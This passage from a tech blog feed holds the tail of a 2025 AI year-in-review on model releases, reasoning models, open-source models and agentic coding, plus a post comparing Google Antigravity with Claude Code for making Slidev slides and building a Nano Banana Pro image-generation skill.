OpenAI released its 4o Image Generation model, flooding the web with Studio Ghibli pastiches.

April

OpenAI released o4-mini, a smart yet reasonably fast reasoning model. In a brief conversation, it explained Einstein’s General Theory of Relativity to me - a topic I had struggled to understand despite many approaches.

May

Google released Veo 3, allowing us to create videos that are sometimes hard to distinguish from real recordings.

June

Gemini 2.5 Pro brought Google back to the AI game. And with Gemini 2.5 Flash, we finally had a model good at summarization and data extraction, yet fast and cheap.

July

DeepMind achieved gold-level performance at the International Mathematical Olympiad.

From worldwide achievement to everyday production

And that was just the first half of 2025.

Progress arrived with significant caveats. We saw impressive demos and breakthroughs that often failed in production:

Too slow or costly: Early reasoning models (o1) and web search AI agents (Deep Research) were powerful but impractical for daily loops.
Overcaffeinated AI agents: Tools like early Claude Code (with Sonnet 3.7) were as likely to wreak havoc on your codebase as to fix it.
The uncanny valley: Image generators (initial 4o Image Generation and Nano Banana) created stunning visuals but were unreliable for complicated instructions or text rendering.

The potential was undeniable, but extracting it required heavy lifting: extensive prompt engineering beforehand and rigorous auditing afterwards. It felt like managing an intern who needs constant supervision rather than collaborating with a capable colleague.

For pragmatists who ignore benchmarks and hype, the calculation is simple: does the tool improve net efficiency? A model that performs a task—a technical feat in itself—is useless if it demands more time in manual cleanup than it saves.

Now

A lot of things that were research achievements by the first half 2025, by its end became tools used daily.

Reasoning is mainstream

The first reasoning model was OpenAI o1, released Dec 2024. Likely thanks to DeepSeek-R1, other labs could move forward, making it both smarter and faster. Now all main models do that, especially the leading ones - GPT 5.2, Opus 4.5 and Gemini 3 Pro.

Deep research

Now, what was costly with Deep Research is an everyday search with any major AI provider - ChatGPT or Google Gemini. The peak performance of reasoning models from early 2025 is now way faster, cheaper, and more accurate. It is no longer a separate operation, but searching is a tool, that can be done iteratively, and combined with other actions. It changes from AI that hallucinate a lot to ones that can web search and fact-check themselves.

Open source is back into the game

Dec 2024, there was release of DeepSeek model, first open source model in the league of proprietary. Now, there are more. Various iterations of DeepSeek, Kimi-K2 Thinking, MiniMax-M1, GLM-4.7, and Mistral 3. Even hell froze as OpenAI released open source models.

AGI benchmarks

ARC-AGI-2 and Humanity’s Last Exam were tests created to be purposefully hard, to last longer than typical benchmarks.

Yet, by the end of 2025, for HLE Gemini 3 Pro has 37%. For ARC-AGI-2, Gemini 3 Pro solves over 30%, Claude Opus 4.5 almost 40%, and GPT-5.2 over 50%. It was not a test meant to be beaten so quickly!

Agentic coding

Claude Code is de facto AGI. Not necessarily superhuman yet, but capable of doing anything. If you can operate with code, and calling external APIs, you can do anything. It took me some time to pick that, as I favoured semi-manual use of Cursor. Yet, with multiple mentions on Hacker News I gave it a go and it permanently became one of the things in my toolbox. It’s development was nicely described in How Claude Code is built by Gergely Orosz, the Pragmatic Engineer.

With Claude Sonnet 3.7 it was awkward. With great power comes great responsibility - and this model often wreaked havoc on the codebase while not solving the main issue. Yet with better and better models it became both faster and smarter: Sonnet 4 was better, then Opus 4 better but slower (and expensive), Sonnet 4.5 same power but way faster, and Opus 4.5 - same speed, but smarter.

All you need is a sufficiently strong model, long context, and the ability to call tools to get everything done. They can search, gather information, extract, and visualize whatever you need. With Opus 4.5, we get a lot of power at a fast pace.

Other players followed - there is Codex CLI by OpenAI, Gemini CLI, and Cursor CLI. See more on testing agents and models in Migrating CompileBench to Harbor: standardizing AI agent evals.

Image generation

Nano Banana Pro changed the game, from images for concept art to one able to generate infographics and charts - factually correct, based on web searches. You can easily add to your agentic workflow - using Antigravity or Claude Skills.

Advanced uses

It is no longer a tool to do maths homework or for research challenges like international olympiads. It is becoming a tool for working.

Quantum computing researcher Scott Aaronson and Field’s Medalist Terence Tao use AI to advance their studies.

Sure, it still makes silly mistakes. But in smart hands, it gets even smarter.

Conclusion

It was the most intense year when it comes to AI development. One crucial part is that many things that were great tech demos but not usable in everyday work, are now standard tools.

I just scratched the surface of selected model releases (even not all I used), not even all demos I got mesmerized by or research papers. I recommend insights 2025 LLM Year in Review by Andrej Karpathy (also referring to his “vibe coding”), a nice overview 2025: The year in LLMs by Simon Willison and AI News, a daily newsletter I have been following the whole year.

Even if my job is fully focused on AI, and in free time I am also excited by it as well, it is impossible to keep track.

Antigravity feels heavy and Claude Skills are light

Team Quesma — Thu, 18 Dec 2025 13:33:38 +0000

This blog post was authored by Piotr Migdal.

In less than a month there were three frontier model releases: Gemini 3 Pro, Claude Opus 4.5 and GPT-5.2. Moreover, Google shipped a new IDE, Antigravity, promising better integration with their models and the browser.

It sounds like a wonder. I saw on Hacker News an interactive visualization of statistical physics - showing combination of PhD-level STEM skills of Gemini 3 Pro combined with Antigravity browser integration. It was even more tempting as it had support of Nano Banana Pro (a game-changer for visualization, including creating charts), so it can create visual assets on the fly, having all context. It was all spiced up by the fact that Google acquihired Windsurf team, arguably the strongest competitor of Cursor.

I liked the name Antigravity. Not just as a physicist, but as someone who loves puns and easter eggs; and Antigravity is almost definitely a play on words on an xkcd strip and AGI - in the comman line, it is agy.

I decided to give it a try - yet went back to Claude Code. Let me share why!

Slide side by side

To test Antigravity vs Claude Code, I wanted to have the same project, side-by-side, spending the same amount of time and effort. The idea was not to create a proper benchmark - for that, n=1 would not be enough. Rather, I wanted to see not only the result, but the overall user experience.

To make it a challenge, I decided to use it to create slides with Markdown using Slidev. That way it will make it a comprehensive check of its ability to use a framework, understand an advanced topic, and create consistent graphics. As I just had a discussion with a quantum information researcher, Artur Ekert, I went with this prompt:

Use Slidev and pnpm to create a short presentation on Device Independent Quantum Key Distribution. The presentation was to be held in Hong Kong, for a young audience - use consistent anime style for pictures. Generate images with Nano Banana Pro.

I didn’t interfere with the content - this was a test of the workflow, not an attempt to ship the slides. Here’s the result:

Example slide, created with Antigravity. See the presentation and its source.

And this example from Claude Code. See the presentation and its source.

In both cases it worked! There are some rough edges, but given the ease of use, I was impressed by both. Yet, while working with Claude Code was a breeze, my experience with Antigravity was full of frustration.

Impressions of Antigravity

When I need to edit files manually or check new models, I go with Cursor - for example, writing this blog post. Yet, here I wanted to see if Antigravity makes it better.

I saw that in some cases it is better at creating websites, as it has built-in browser support (see this reverse engineering analysis to understand how it works). What I also discovered is that it has a native way of generating images with Nano Banana Pro. It is (allegedly) better integrated with Gemini 3 Pro. Or at least I assumed that since it is developed by Google, all context engineering tweaks will be focused on their top model as the first-class citizen.

Creating images in the editor (with context of the whole project) is immensely useful. Much like why we have AI editors in the first place, rather than copying and pasting code to a chat editor, and copying it back to the project.

Sadly, good things end here.

The first thing I noticed was that it felt slow. The model itself isn’t lightning-fast, but Antigravity felt heavier (pun absolutely intended) than Cursor, and the built-in browser took ages. Second, the interface is underpolished - for example, when the model needs my action, it can be hidden (literally folded) in the UI. Third, it feels ill-prompted: I asked it to check something, and instead of doing that, it gets trigger-happy. Think early days of Cursor + Sonnet 3.7. Fourth, it soon told me I was out of tokens and needed to wait - with no option to pay to continue. Frankly, I don’t understand why. I guess no one does.

I wanted to create a web-based game to see where Antigravity shines… but was not able to.

I turned out to be the lucky one - as there are data risks and Google Antigravity may delete the contents of my whole drive. Live by vibe coding, die by vibe coding.

Sure, you may give it a try - but it does not seem production-ready.

The bliss of Claude Code

So, I went back to Claude Code, my go-to vibe coding tool, which I usually use within Ghostty terminal.

First: checking the output. Without it, you’re coding blind; generally, it makes no sense (how many of you can code a website without ever looking at it?). I use lackeyjb/playwright-skill. It just works. And to open a website and take a screenshot it happens in the blink of an eye.

Since I wanted to use Nano Banana Pro, I asked Claude Code to use an API to generate images. It took a few prompts: it tried to persuade me that Nano Banana Pro is a made-up name and that the model gemini-3-pro-image-preview does not exist. This is a typical failure mode: major models can be oblivious to things past their knowledge cutoff (and they sometimes refuse to web-search because they “know better”). Fortunately, pointing it to my last blog post and the documentation helped.

To avoid repeating those correction cycles (which model to use, what parameters to pass), I created a Claude Skill, ~/.claude/skills/nano-banana-pro. It has two components: SKILL.md (essentially its README.md) and a script that actually runs it. I use uv scripts so dependencies are declared in the header. I created it in no time - and you can as well. Oftentimes it may be easier to vibe code your own skill, tweaked for your use-case and workflow, than search for one. Ironically, the hardest part is getting a Gemini API key.

Since you might want to use it as well, I wrapped it as a Claude Plugin: stared/gemini-claude-skills. In addition, I added a way to consult Gemini 3 Pro - for search, reasoning, and its vision skills.

Conclusion

Antigravity is a new IDE in the town. While right now there are many rough edges, I am sure it will get polished. It is hard to predict what will happen in the arena of AI-first Visual Studio Code forks.

But I think that there is much bigger thing going on - skills. As Simon Willison noted, Claude Skills are awesome, maybe a bigger deal than MCP. I was skeptical when I read his post (mid Oct 2025). Now it becomes mainstream, and ChatGPT joined the skill game.

Skills make models transcend their own skills - not only because they have recipes, but because it means that they can call other models as well. That way, the gap between “which base model do you use?” shrinks. Even when a newer, better model is released, you don’t need to change your editor - you just swap what your skills call.

Which skills are your favorites? And which skills do you want to teach your favourite tool today? And for generating images, would you still copy-and-paste your prompt into a chat window, or combine it with your workflow?